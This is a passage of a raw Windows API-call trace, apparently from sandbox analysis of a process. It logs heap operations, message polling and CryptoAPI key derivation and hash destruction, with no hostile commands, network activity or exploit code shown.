Size=0x8) returned 0x2e55098 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0228.907] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0228.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0228.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0228.907] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0228.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0228.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0228.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0228.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0228.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0228.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0228.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0228.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0228.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0228.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0228.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0228.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0228.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0228.908] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0228.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0228.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0228.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0228.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0228.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0228.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0228.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0228.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0228.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0228.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0228.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0228.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0228.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0228.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0228.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0228.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0228.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0228.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0228.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0228.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0228.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0228.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51580 [0228.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51580, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0228.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0228.911] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0228.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0228.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0228.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0228.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0228.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0228.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0228.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0228.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0228.911] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87310) returned 1 [0228.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0228.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0228.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0228.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0228.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0228.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0228.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0228.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0228.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0228.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0228.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0228.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0228.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0228.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0228.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0228.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0228.915] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0228.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0228.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0228.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0228.915] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.915] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0228.915] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0228.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0228.915] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0228.915] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0228.916] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.916] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0228.916] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0228.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69928 [0228.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0228.916] CryptDestroyHash (hHash=0xa87050) returned 1 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.916] RtlAllocateHeap 